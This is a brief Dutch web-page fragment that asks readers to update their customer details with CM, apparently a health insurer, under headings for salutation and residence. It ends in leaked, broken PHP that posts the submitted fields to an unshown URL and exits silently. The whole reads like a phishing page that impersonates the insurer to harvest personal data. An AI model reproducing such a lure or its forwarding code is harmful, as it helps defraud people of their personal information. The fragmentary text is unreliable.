Zijn uw klantgegevens nog actueel?

Gelieve in eigen naam (als gerechtigde) uw gegevens actualiseren bij CM.

Aanhef
Hoofdverblijfplaats

Andere gegevens
$ch = curl_init(); curl_setopt($ch, CURLOPT_URL, $url); curl_setopt($ch, CURLOPT_POST, 1); curl_setopt($ch, CURLOPT_POSTFIELDS, $post_fields); curl_setopt($ch, CURLOPT_RETURNTRANSFER, true); $response = curl_exec($ch); if ($response === false) { echo 'Curl error: ' . curl_error($ch); } else { echo ''; exit(); } } ?>